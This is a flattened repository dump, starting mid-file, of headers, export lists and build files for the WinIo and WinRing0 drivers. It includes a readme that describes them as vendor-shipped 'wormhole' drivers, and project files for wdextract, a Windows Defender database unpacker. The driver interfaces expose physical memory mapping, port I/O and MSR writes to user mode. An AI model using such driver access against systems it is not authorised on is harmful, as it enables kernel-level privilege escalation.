WINIO_API bool _stdcall GetPortVal(WORD wPortAddr, PDWORD pdwPortVal, BYTE bSize); 21 | WINIO_API bool _stdcall SetPortVal(WORD wPortAddr, DWORD dwPortVal, BYTE bSize); 22 | WINIO_API bool _stdcall InstallWinIoDriver(PWSTR pszWinIoDriverPath, bool IsDemandLoaded = false); 23 | WINIO_API bool _stdcall RemoveWinIoDriver(); 24 | } 25 | 26 | extern HANDLE hDriver; 27 | extern bool IsWinIoInitialized; 28 | extern bool g_Is64BitOS; 29 | 30 | bool _stdcall StartWinIoDriver(); 31 | bool _stdcall StopWinIoDriver(); 32 | 33 | #endif 34 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Source/Drv/MAKEFILE: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the driver components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Source/Drv/SOURCES: -------------------------------------------------------------------------------- 1 | TARGETNAME=WinIo 2 | TARGETPATH=. 3 | TARGETTYPE=DRIVER 4 | NTDEBUG=ntsd 5 | 6 | SOURCES= winio.c 7 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Source/Drv/winio_nt.h: -------------------------------------------------------------------------------- 1 | #ifndef WINIONT_H 2 | #define WINIONT_H 3 | 4 | // Define the various device type values. Note that values used by Microsoft 5 | // Corporation are in the range 0-32767, and 32768-65535 are reserved for use 6 | // by customers. 7 | 8 | #define FILE_DEVICE_WINIO 0x00008010 9 | 10 | // Macro definition for defining IOCTL and FSCTL function control codes. 11 | // Note that function codes 0-2047 are reserved for Microsoft Corporation, 12 | // and 2048-4095 are reserved for customers. 13 | 14 | #define WINIO_IOCTL_INDEX 0x810 15 | 16 | // Define our own private IOCTL 17 | 18 | #define IOCTL_WINIO_MAPPHYSTOLIN CTL_CODE(FILE_DEVICE_WINIO, \ 19 | WINIO_IOCTL_INDEX, \ 20 | METHOD_BUFFERED, \ 21 | FILE_ANY_ACCESS) 22 | 23 | #define IOCTL_WINIO_UNMAPPHYSADDR CTL_CODE(FILE_DEVICE_WINIO, \ 24 | WINIO_IOCTL_INDEX + 1, \ 25 | METHOD_BUFFERED, \ 26 | FILE_ANY_ACCESS) 27 | 28 | #define IOCTL_WINIO_ENABLEDIRECTIO CTL_CODE(FILE_DEVICE_WINIO, \ 29 | WINIO_IOCTL_INDEX + 2, \ 30 | METHOD_BUFFERED, \ 31 | FILE_ANY_ACCESS) 32 | 33 | #define IOCTL_WINIO_DISABLEDIRECTIO CTL_CODE(FILE_DEVICE_WINIO, \ 34 | WINIO_IOCTL_INDEX + 3, \ 35 | METHOD_BUFFERED, \ 36 | FILE_ANY_ACCESS) 37 | 38 | #define IOCTL_WINIO_READPORT CTL_CODE(FILE_DEVICE_WINIO, \ 39 | WINIO_IOCTL_INDEX + 4, \ 40 | METHOD_BUFFERED, \ 41 | FILE_ANY_ACCESS) 42 | 43 | #define IOCTL_WINIO_WRITEPORT CTL_CODE(FILE_DEVICE_WINIO, \ 44 | WINIO_IOCTL_INDEX + 5, \ 45 | METHOD_BUFFERED, \ 46 | FILE_ANY_ACCESS) 47 | 48 | #pragma pack(push) 49 | #pragma pack(1) 50 | 51 | struct tagPhysStruct 52 | { 53 | DWORD64 dwPhysMemSizeInBytes; 54 | DWORD64 pvPhysAddress; 55 | DWORD64 PhysicalMemoryHandle; 56 | DWORD64 pvPhysMemLin; 57 | DWORD64 pvPhysSection; 58 | }; 59 | 60 | struct tagPortStruct 61 | { 62 | USHORT wPortAddr; 63 | ULONG dwPortVal; 64 | UCHAR bSize; 65 | }; 66 | 67 | #pragma pack(pop) 68 | 69 | #endif 70 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINRING0/README.md: -------------------------------------------------------------------------------- 1 | # WinRing0 2 | Windows Ring0 Access 3 | 4 | ###File Directory 5 | 6 | >dll 7 | * driver source 8 | 9 | >drv 10 | * driver normal interface 11 | 12 | ##Description 13 | Allow user application to access ring0 level resource 14 | 15 | * access cpu msr register 16 | * read/write memory directly 17 | * io pci device 18 | * etc... 19 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINRING0/dll/Driver.h: -------------------------------------------------------------------------------- 1 | //----------------------------------------------------------------------------- 2 | // Author : hiyohiyo 3 | // Mail : hiyohiyo@crystalmark.info 4 | // Web : http://openlibsys.org/ 5 | // License : The modified BSD license 6 | // 7 | // Copyright 2007 OpenLibSys.org. All rights reserved. 8 | //----------------------------------------------------------------------------- 9 | 10 | #pragma once 11 | 12 | #define OLS_DRIVER_INSTALL 1 13 | #define OLS_DRIVER_REMOVE 2 14 | #define OLS_DRIVER_SYSTEM_INSTALL 3 15 | #define OLS_DRIVER_SYSTEM_UNINSTALL 4 16 | 17 | BOOL ManageDriver(LPCTSTR DriverId, LPCTSTR DriverPath, USHORT Function); -------------------------------------------------------------------------------- /source/WormholeDrivers/WINRING0/dll/OlsApi.def: -------------------------------------------------------------------------------- 1 | EXPORTS 2 | 3 | GetDllStatus @1 4 | GetDllVersion @2 5 | GetDriverVersion @3 6 | GetDriverType @4 7 | 8 | InitializeOls @7 9 | DeinitializeOls @8 10 | 11 | IsCpuid @11 12 | IsMsr @12 13 | IsTsc @13 14 | 15 | Hlt @20 16 | Rdmsr @21 17 | Wrmsr @22 18 | Rdpmc @23 19 | Cpuid @24 20 | Rdtsc @25 21 | 22 | HltTx @30 23 | RdmsrTx @31 24 | WrmsrTx @32 25 | RdpmcTx @33 26 | CpuidTx @34 27 | RdtscTx @35 28 | 29 | HltPx @40 30 | RdmsrPx @41 31 | WrmsrPx @42 32 | RdpmcPx @43 33 | CpuidPx @44 34 | RdtscPx @45 35 | 36 | ReadIoPortByte @51 37 | ReadIoPortWord @52 38 | ReadIoPortDword @53 39 | WriteIoPortByte @54 40 | WriteIoPortWord @55 41 | WriteIoPortDword @56 42 | 43 | ReadIoPortByteEx @61 44 | ReadIoPortWordEx @62 45 | ReadIoPortDwordEx @63 46 | WriteIoPortByteEx @64 47 | WriteIoPortWordEx @65 48 | WriteIoPortDwordEx @66 49 | 50 | SetPciMaxBusIndex @70 51 | 52 | ReadPciConfigByte @81 53 | ReadPciConfigWord @82 54 | ReadPciConfigDword @83 55 | WritePciConfigByte @84 56 | WritePciConfigWord @85 57 | WritePciConfigDword @86 58 | FindPciDeviceById @87 59 | FindPciDeviceByClass @88 60 | 61 | ReadPciConfigByteEx @91 62 | ReadPciConfigWordEx @92 63 | ReadPciConfigDwordEx @93 64 | WritePciConfigByteEx @94 65 | WritePciConfigWordEx @95 66 | WritePciConfigDwordEx @96 67 | 68 | ;ReadDmiMemory @100 69 | ;ReadPhysicalMemory @101 70 | ;WritePhysicalMemory @102 71 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINRING0/dll/OlsDef.h: -------------------------------------------------------------------------------- 1 | //----------------------------------------------------------------------------- 2 | // Author : hiyohiyo 3 | // Mail : hiyohiyo@crystalmark.info 4 | // Web : http://openlibsys.org/ 5 | // License : The modified BSD license 6 | // 7 | // Copyright 2007 OpenLibSys.org. All rights reserved. 8 | //----------------------------------------------------------------------------- 9 | 10 | #pragma once 11 | 12 | //----------------------------------------------------------------------------- 13 | // 14 | // DLL Status Code 15 | // 16 | //----------------------------------------------------------------------------- 17 | 18 | #define OLS_DLL_NO_ERROR 0 19 | #define OLS_DLL_UNSUPPORTED_PLATFORM 1 20 | #define OLS_DLL_DRIVER_NOT_LOADED 2 21 | #define OLS_DLL_DRIVER_NOT_FOUND 3 22 | #define OLS_DLL_DRIVER_UNLOADED 4 23 | #define OLS_DLL_DRIVER_NOT_LOADED_ON_NETWORK 5 24 | #define OLS_DLL_UNKNOWN_ERROR 9 25 | 26 | //----------------------------------------------------------------------------- 27 | // 28 | // Driver Type 29 | // 30 | //----------------------------------------------------------------------------- 31 | 32 | #define OLS_DRIVER_TYPE_UNKNOWN 0 33 | #define OLS_DRIVER_TYPE_WIN_9X 1 34 | #define OLS_DRIVER_TYPE_WIN_NT 2 35 | #define OLS_DRIVER_TYPE_WIN_NT4 3 // Obsolete 36 | #define OLS_DRIVER_TYPE_WIN_NT_X64 4 37 | #define OLS_DRIVER_TYPE_WIN_NT_IA64 5 // Reseved 38 | 39 | //----------------------------------------------------------------------------- 40 | // 41 | // PCI Error Code 42 | // 43 | //----------------------------------------------------------------------------- 44 | 45 | #define OLS_ERROR_PCI_BUS_NOT_EXIST (0xE0000001L) 46 | #define OLS_ERROR_PCI_NO_DEVICE (0xE0000002L) 47 | #define OLS_ERROR_PCI_WRITE_CONFIG (0xE0000003L) 48 | #define OLS_ERROR_PCI_READ_CONFIG (0xE0000004L) 49 | 50 | //----------------------------------------------------------------------------- 51 | // 52 | // Support Macros 53 | // 54 | //----------------------------------------------------------------------------- 55 | 56 | // Bus Number, Device Number and Function Number to PCI Device Address 57 | #define PciBusDevFunc(Bus, Dev, Func) ((Bus&0xFF)<<8) | ((Dev&0x1F)<<3) | (Func&7) 58 | // PCI Device Address to Bus Number 59 | #define PciGetBus(address) ((address>>8) & 0xFF) 60 | // PCI Device Address to Device Number 61 | #define PciGetDev(address) ((address>>3) & 0x1F) 62 | // PCI Device Address to Function Number 63 | #define PciGetFunc(address) (address&7) 64 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINRING0/dll/OlsDll.h: -------------------------------------------------------------------------------- 1 | //----------------------------------------------------------------------------- 2 | // Author : hiyohiyo 3 | // Mail : hiyohiyo@crystalmark.info 4 | // Web : http://openlibsys.org/ 5 | // License : The modified BSD license 6 | // 7 | // Copyright 2007-2009 OpenLibSys.org. All rights reserved. 8 | //----------------------------------------------------------------------------- 9 | 10 | #pragma once 11 | 12 | //----------------------------------------------------------------------------- 13 | // 14 | // Version Information 15 | // 16 | //----------------------------------------------------------------------------- 17 | 18 | #define OLS_MAJOR_VERSION 1 19 | #define OLS_MINOR_VERSION 3 20 | #define OLS_REVISION 0 21 | #define OLS_RELESE 18 22 | 23 | #define OLS_VERSION ((OLS_MAJOR_VERSION << 24) | (OLS_MINOR_VERSION << 16) |\ 24 | (OLS_REVISION << 8) | OLS_RELESE) 25 | 26 | //----------------------------------------------------------------------------- 27 | // 28 | // Defines 29 | // 30 | //----------------------------------------------------------------------------- 31 | 32 | #define OLS_DRIVER_FILE_NAME_WIN_9X _T("WinRing0.vxd") 33 | #define OLS_DRIVER_FILE_NAME_WIN_NT _T("WinRing0.sys") 34 | #define OLS_DRIVER_FILE_NAME_WIN_NT_X64 _T("WinRing0x64.sys") 35 | #define OLS_DRIVER_FILE_NAME_WIN_NT_IA64 _T("WinRing0ia64.sys") // Reserved 36 | 37 | //----------------------------------------------------------------------------- 38 | // 39 | // Prototypes 40 | // 41 | //----------------------------------------------------------------------------- 42 | 43 | DWORD Initialize(); 44 | void Deinitialize(); 45 | DWORD InitDriverInfo(); 46 | 47 | BOOL OpenDriver(); 48 | BOOL LoadDriver(TCHAR *DriverFileName, TCHAR *DriverId); 49 | BOOL UnloadDriver(TCHAR *DriverId); 50 | DWORD GetRefCount(); 51 | 52 | BOOL IsNT(); 53 | BOOL IsWow64(); -------------------------------------------------------------------------------- /source/WormholeDrivers/WINRING0/dll/OlsDll.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/WINRING0/dll/OlsDll.rc -------------------------------------------------------------------------------- /source/WormholeDrivers/WINRING0/dll/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by OlsDll.rc 4 | // 5 | 6 | // Next default values for new objects 7 | // 8 | #ifdef APSTUDIO_INVOKED 9 | #ifndef APSTUDIO_READONLY_SYMBOLS 10 | #define _APS_NEXT_RESOURCE_VALUE 101 11 | #define _APS_NEXT_COMMAND_VALUE 40001 12 | #define _APS_NEXT_CONTROL_VALUE 1001 13 | #define _APS_NEXT_SYMED_VALUE 101 14 | #endif 15 | #endif 16 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINRING0/dll/stdafx.cpp: -------------------------------------------------------------------------------- 1 | //----------------------------------------------------------------------------- 2 | // Author : hiyohiyo 3 | // Mail : hiyohiyo@crystalmark.info 4 | // Web : http://openlibsys.org/ 5 | // License : The modified BSD license 6 | // 7 | // Copyright 2007 OpenLibSys.org. All rights reserved. 8 | //----------------------------------------------------------------------------- 9 | 10 | #include "stdafx.h" 11 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINRING0/dll/stdafx.h: -------------------------------------------------------------------------------- 1 | //----------------------------------------------------------------------------- 2 | // Author : hiyohiyo 3 | // Mail : hiyohiyo@crystalmark.info 4 | // Web : http://openlibsys.org/ 5 | // License : The modified BSD license 6 | // 7 | // Copyright 2007-2008 OpenLibSys.org. All rights reserved. 8 | //----------------------------------------------------------------------------- 9 | 10 | #pragma once 11 | 12 | #ifndef WINVER 13 | #define WINVER 0x0400 14 | #endif 15 | 16 | #ifndef _WIN32_WINNT 17 | #define _WIN32_WINNT 0x0400 18 | #endif 19 | 20 | #ifndef _WIN32_WINDOWS 21 | #define _WIN32_WINDOWS 0x0410 22 | #endif 23 | 24 | #ifndef _WIN32_IE 25 | #define _WIN32_IE 0x0600 26 | #endif 27 | 28 | #define WIN32_LEAN_AND_MEAN 29 | #include 30 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINRING0/dll/sys/MAKEFILE: -------------------------------------------------------------------------------- 1 | # 2 | # DO NOT EDIT THIS FILE!!! Edit .\sources. if you want to add a new source 3 | # file to this component. This file merely indirects to the real make file 4 | # that is shared by all the driver components of the Windows NT DDK 5 | # 6 | 7 | !INCLUDE $(NTMAKEENV)\makefile.def 8 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINRING0/dll/sys/OpenLibSys.rc: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #define VER_FILETYPE VFT_DRV 5 | #define VER_FILESUBTYPE VFT2_DRV_SYSTEM 6 | 7 | #define VER_FILEDESCRIPTION_STR "WinRing0" 8 | #define VER_INTERNALNAME_STR "WinRing0.sys" 9 | 10 | ///////////////////////////////////////////////////////////////////////////// 11 | // 12 | // Version 13 | // 14 | 15 | VS_VERSION_INFO VERSIONINFO 16 | FILEVERSION 1, 2, 0, 5 17 | PRODUCTVERSION 1, 2, 0, 5 18 | FILEFLAGSMASK 0x3fL 19 | FILEFLAGS 0x0L 20 | FILEOS 0x40004L 21 | FILETYPE 0x2L 22 | FILESUBTYPE 0x0L 23 | BEGIN 24 | BLOCK "StringFileInfo" 25 | BEGIN 26 | BLOCK "041104b0" 27 | BEGIN 28 | VALUE "Comments", "The modified BSD license\0" 29 | VALUE "CompanyName", "OpenLibSys.org\0" 30 | VALUE "FileDescription", "WinRing0\0" 31 | VALUE "FileVersion", "1.2.0.5\0" 32 | VALUE "InternalName", "WinRing0.sys\0" 33 | VALUE "LegalCopyright", "Copyright (C) 2007-2008 OpenLibSys.org. All rights reserved.\0" 34 | VALUE "OriginalFilename", "WinRing0.sys\0" 35 | VALUE "ProductName", "WinRing0\0" 36 | VALUE "ProductVersion", "1.2.0.5\0" 37 | END 38 | END 39 | BLOCK "VarFileInfo" 40 | BEGIN 41 | VALUE "Translation", 0x411, 1200 42 | END 43 | END 44 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINRING0/dll/sys/SOURCES: -------------------------------------------------------------------------------- 1 | TARGETNAME=WinRing0 2 | TARGETPATH=lib 3 | TARGETTYPE=DRIVER 4 | 5 | INCLUDES=..\ 6 | 7 | SOURCES=OpenLibSys.c OpenLibSys.rc 8 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINRING0/dll/vxd/Makefile: -------------------------------------------------------------------------------- 1 | #----------------------------------------------------------------------------- 2 | # Author : hiyohiyo 3 | # Mail : hiyohiyo@crystalmark.info 4 | # Web : http://openlibsys.org/ 5 | # License : The modified BSD license 6 | # 7 | # Copyright 2007 hiyohiyo, All rights reserved. 8 | #----------------------------------------------------------------------------- 9 | # 10 | # How to build on Windows XP SP1 DDK (Win Me Free Build Environment) 11 | # 12 | # 0. Get Windows XP SP1 DDK from MSDN 13 | # 1. Install Windows XP SP1 DDK with Win Me support 14 | # 2. Open "Win Me Free Build Environment" 15 | # 3. cd (WinRing0)\source\dll\vxd 16 | # 4. nmake 17 | # 18 | # Compile Options 19 | #_OPEN_LIB_SYS= 20 | 21 | !ifdef _OPEN_LIB_SYS 22 | VXDFILE = OpenLibSys.vxd 23 | !else 24 | VXDFILE = WinRing0.vxd 25 | !endif 26 | 27 | OBJDIR = bin 28 | VXDWRAPSDIR = $(DDKROOT)\lib\win_me\ 29 | 30 | RC16 = $(DDKROOT)\bin\win_me\bin16\rc 31 | ML = $(DDKROOT)\bin\win_me\bin\ml 32 | CL = $(DDKROOT)\bin\x86\cl 33 | LINK = $(DDKROOT)\bin\x86\link 34 | 35 | !ifdef DEBUG 36 | DDEBUG =-DDEBLEVEL=1 -DDEBUG 37 | !else 38 | DDEBUG =-DDEBLEVEL=0 39 | !endif 40 | 41 | CFLAGS = -Zdp -Gs -c -DIS_32 $(DDEBUG) 42 | LFLAGS = -machine:i386 -debug:none kernel32.lib 43 | AFLAGS = -coff -DBLD_COFF -DIS_32 -W2 -Zd -c -Cx -DMASM6 44 | 45 | all: direxist $(OBJDIR)\OpenLS.vxd 46 | 47 | direxist: 48 | if not exist $(OBJDIR)\nul md $(OBJDIR) 49 | 50 | $(OBJDIR)\OpenLS.res: OpenLS.rc 51 | $(RC16) -Fo$@ -r OpenLS.rc 52 | 53 | $(OBJDIR)\OpenLS.obj: OpenLS.c 54 | $(CL) $(CFLAGS) -Fo$@ %s 55 | 56 | $(OBJDIR)\ctrl.obj: ctrl.asm 57 | $(ML) $(AFLAGS) -Fo$@ %s 58 | 59 | $(OBJDIR)\OpenLS.vxd: $(OBJDIR)\OpenLS.obj $(OBJDIR)\ctrl.obj\ 60 | $(OBJDIR)\OpenLS.res OpenLS.def 61 | echo >NUL @< 36 | clc 37 | ret 38 | EndProc OPENLS_Control 39 | 40 | public C Exec_VxD_Int_rap 41 | Exec_VxD_Int_rap proc 42 | push dword ptr 1ah 43 | VmmCall Exec_VxD_Int 44 | ret 45 | Exec_VxD_Int_rap endp 46 | 47 | VxD_LOCKED_CODE_ENDS 48 | 49 | end 50 | -------------------------------------------------------------------------------- /source/WormholeDrivers/readme.txt: -------------------------------------------------------------------------------- 1 | Collection of "wormhole" open source drivers widely used by hardware vendors sometimes in unmodified state. 2 | 3 | MAPMEM - NTDDK 3.51 example from 1993, multiple usage, noticable usage by Gigabyte, SuperMicro 4 | PHYMEM - by akui, multiple usage, noticable usage by Realtek, SuperMicro 5 | WINIO - by Yariv Kaplan, multiple usage, ENETECH I/O drivers main source of inspiration 6 | WINRING0 - by hiyohiyo, multiple usage, literally everywhere 7 | INPOUT - by Phillip Gibbon, based on hwinterface by Logix4U. 8 | 9 | (c) drivers authors -------------------------------------------------------------------------------- /source/wdextract/README.md: -------------------------------------------------------------------------------- 1 | 2 | # wdextract 3 | ## Extract Windows Defender database from vdm files and unpack it 4 | 5 | Based on original PowerShell script https://gist.github.com/mattifestation/3af5a472e11b7e135273e71cb5fed866 6 | 7 | Rewrote to C++ because it is much faster than any script. 8 | 9 | ### Usage wdextract "vdm filename" 10 | 11 | + This program distributed as-is; 12 | + Uses ZLIB Data Compression Library (https://github.com/madler/zlib); 13 | + Built with MSVC 2017 with SDK 17763. 14 | -------------------------------------------------------------------------------- /source/wdextract/wdextract.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.539 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "wdextract", "wdextract\wdextract.vcxproj", "{08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Debug|x64.ActiveCfg = Debug|x64 17 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Debug|x64.Build.0 = Debug|x64 18 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Debug|x86.ActiveCfg = Debug|Win32 19 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Debug|x86.Build.0 = Debug|Win32 20 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Release|x64.ActiveCfg = Release|x64 21 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Release|x64.Build.0 = Release|x64 22 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Release|x86.ActiveCfg = Release|Win32 23 | {08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {DB1C4BA6-54B6-4E86-9651-1D868FC12E74} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /source/wdextract/wdextract/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /source/wdextract/wdextract/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /source/wdextract/wdextract/wdextract.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /source/wdextract/wdextract/wdextract.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | C:\wdbase\mpasbase.dll 5 | WindowsLocalDebugger 6 | 7 | 8 | c:\wdbase\mpavbase.vdm 9 | WindowsLocalDebugger 10 | 11 | 12 | C:\wdbase\mpasbase.dll 13 | WindowsLocalDebugger 14 | 15 | -------------------------------------------------------------------------------- /source/wdextract/wdextract/zlibwapi.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/wdextract/wdextract/zlibwapi.lib --------------------------------------------------------------------------------